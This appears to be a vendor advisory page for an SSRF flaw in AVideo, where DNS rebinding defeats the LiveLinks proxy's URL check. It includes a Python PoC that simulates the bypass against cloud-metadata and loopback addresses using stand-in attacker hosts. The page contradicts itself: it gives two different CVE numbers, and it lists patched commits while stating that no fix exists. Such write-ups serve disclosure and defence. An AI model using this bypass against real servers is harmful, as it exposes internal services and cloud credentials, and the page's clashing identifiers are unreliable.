CVE-2026-41055

CVE-2026-41055 is a medium-severity server-side request forgery (SSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet.

Summary

The incomplete SSRF fix in AVideo's LiveLinks proxy adds isSSRFSafeURL() validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints.

Affected Package

  • Ecosystem: Other
  • Package: AVideo
  • Affected versions: < commit 0e56382921fc71e64829cd1ec35f04e338c70917
  • Patched versions: >= commit 0e56382921fc71e64829cd1ec35f04e338c70917

Details

The plugin/LiveLinks/proxy.php endpoint proxies live stream URLs. The fix adds isSSRFSafeURL() check on the initial URL, redirect URL validation, and follow_location=0 in the get_headers() context. However, multiple DNS TOCTOU vulnerabilities remain.

For the initial URL, isSSRFSafeURL() resolves DNS once for validation, but get_headers() resolves DNS again independently. A DNS rebinding attack with TTL=0 returns a safe external IP for the first resolution and an internal IP for the second.

The same TOCTOU exists for redirect URLs: isSSRFSafeURL() validates the redirect target (first resolution returns a safe IP), then fakeBrowser() makes the actual request (second resolution returns an internal IP).

Additionally, even with follow_location=0, get_headers() still sends an HTTP request that can probe internal services via DNS rebinding, and multiple Location headers in a response cause filter_var() to receive an array instead of a string, resulting in a fall-through to the else branch.

PoC

#!/usr/bin/env python3
"""
CVE-2026-33039 - AVideo LiveLinks Proxy SSRF via DNS Rebinding
"""

import re
import sys

class DNSResolver:
    def __init__(self):
        self._call_count = {}

    def resolve(self, host):
        if host not in self._call_count:
            self._call_count[host] = 0
        self._call_count[host] += 1

        if host == "rebind.attacker.com":
            return "93.184.216.34" if self._call_count[host] == 1 else "169.254.169.254"
        if host == "rebind-loopback.attacker.com":
            return "93.184.216.34" if self._call_count[host] == 1 else "127.0.0.1"

        static = {"attacker.com": "93.184.216.34", "example.com": "93.184.216.34", "localhost": "127.0.0.1"}
        return static.get(host, None)

    def reset(self):
        self._call_count = {}

dns = DNSResolver()

def php_parse_url_host(url):
    match = re.match(r'https?://([^/:?#]+)', url, re.IGNORECASE)
    return match.group(1).lower() if match else None

def php_filter_validate_ip(s):
    if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', s):
        return all(0 <= int(p) <= 255 for p in s.split('.'))
    return False

def is_ssrf_safe_url(url):
    if not url: return False, "empty"
    host = php_parse_url_host(url)
    if not host: return False, "no host"

    for pat in ['localhost', '127.0.0.1', '::1', '0.0.0.0']:
        if host == pat: return False, f"blocked: {host}"

    ip = host
    if not php_filter_validate_ip(host):
        resolved = dns.resolve(host)
        if not resolved: return False, "DNS failed"
        ip = resolved

    for pattern in [r'^10\.', r'^172\.(1[6-9]|2\d|3[0-1])\.', r'^192\.168\.', r'^127\.', r'^169\.254\.']:
        if re.match(pattern, ip): return False, f"blocked: {ip}"

    return True, f"allowed ({ip})"

def main():
    print("=" * 72)
    print("CVE-2026-33039 - AVideo LiveLinks Proxy SSRF PoC")
    print("=" * 72)

    vuln_count = 0

    print("\n[TEST 1] DNS rebinding on initial URL")
    dns.reset()
    safe, reason = is_ssrf_safe_url("http://rebind.attacker.com/meta-data/")
    actual_ip = dns.resolve("rebind.attacker.com")
    print(f"  isSSRFSafeURL: safe={safe}, reason={reason}")
    print(f"  Actual request goes to: {actual_ip}")
    if safe and actual_ip == "169.254.169.254":
        print("  => BYPASS!")
        vuln_count += 1

    print("\n[TEST 2] DNS rebinding on redirect URL")
    dns.reset()
    safe_r, _ = is_ssrf_safe_url("http://rebind-loopback.attacker.com/admin/")
    final_ip = dns.resolve("rebind-loopback.attacker.com")
    print(f"  isSSRFSafeURL: safe={safe_r}")
    print(f"  fakeBrowser() goes to: {final_ip}")
    if safe_r and final_ip == "127.0.0.1":
        print("  => BYPASS!")
        vuln_count += 1

    print("\n[TEST 3] get_headers() side-effect")
    dns.reset()
    safe, _ = is_ssrf_safe_url("http://rebind.attacker.com:8080/probe")
    side_ip = dns.resolve("rebind.attacker.com")
    print(f"  isSSRFSafeURL passed: {safe}")
    print(f"  get_headers() reached: {side_ip}")
    if safe and side_ip == "169.254.169.254":
        print("  => BYPASS!")
        vuln_count += 1

    print(f"\nBypass vectors: {vuln_count}")
    if vuln_count > 0:
        print("\nVULNERABILITY CONFIRMED")
        return 0
    return 1

if __name__ == "__main__":
    sys.exit(main())

Steps to reproduce:

  1. Run python3 poc.py.
  2. Observe that all three DNS rebinding bypass vectors succeed.

Expected output:

VULNERABILITY CONFIRMED
DNS TOCTOU bypass vectors succeed on initial URL, redirect URL, and get_headers() side-effect paths.

Suggested Remediation

Pin DNS resolution: resolve the hostname once, validate the IP, and use the resolved IP for the actual request via CURLOPT_RESOLVE or equivalent. Remove the get_headers() call. Block redirects entirely or re-validate using pinned DNS after each redirect.

Impact

DNS rebinding allows an attacker to bypass SSRF validation and make the server send requests to internal services, cloud metadata endpoints, and other protected resources.

Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.

CVE-2026-41055 has a CVSS score of 5.3 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 29.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

No fixed version is listed for CVE-2026-41055 yet.

In the interim: Validate and restrict destination URLs against an allowlist. Block requests to private IP ranges and cloud metadata endpoints.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-41055? CVE-2026-41055 is a medium-severity server-side request forgery (SSRF) vulnerability in wwbn/avideo (composer), affecting versions <= 29.0. No fixed version is listed yet. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
  2. How severe is CVE-2026-41055? CVE-2026-41055 has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-41055? wwbn/avideo (composer) versions <= 29.0 is affected.
  4. Is there a fix for CVE-2026-41055? No fixed version is listed for CVE-2026-41055 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-41055 exploitable, and should I be worried? Whether CVE-2026-41055 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-41055 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-41055? No fixed version is listed yet. In the interim: Validate and restrict destination URLs against an allowlist. Block requests to private IP ranges and cloud metadata endpoints.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.